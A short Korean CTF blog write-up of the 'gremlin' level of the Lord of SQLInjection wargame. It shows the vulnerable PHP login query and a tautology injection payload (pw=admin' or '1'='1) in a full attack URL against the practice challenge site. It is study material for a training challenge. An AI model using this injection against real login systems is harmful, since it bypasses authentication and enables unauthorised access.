본문 바로가기
Study/CTF

Lord of SQLInjection: gremlin

by Clotilde 2025. 1. 21.

Problem


Solve

  • 기존 구문 → GET 방식
select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}’

 

  • 변경 구문
select id from prob_gremlin where id='admin' and pw='admin' or '1'='1#’

 

  • 공격 구문
https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=admin&pw=admin' or '1'='1

 

'Study > CTF' 카테고리의 다른 글

Lord of SQLInjection: goblin  (0) 2025.01.21
Lord of SQLInjection: cobolt  (0) 2025.01.21
picoCTF: Insp3ct0r(Web)  (1) 2024.11.09
picoCTF: Cookies(Web)  (0) 2024.11.09
picoCTF: GET aHEAD(Web)  (0) 2024.07.08